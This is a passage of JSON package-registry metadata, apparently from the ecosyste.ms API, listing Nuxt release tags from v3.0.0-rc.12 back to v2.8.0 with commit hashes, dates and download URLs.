0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.e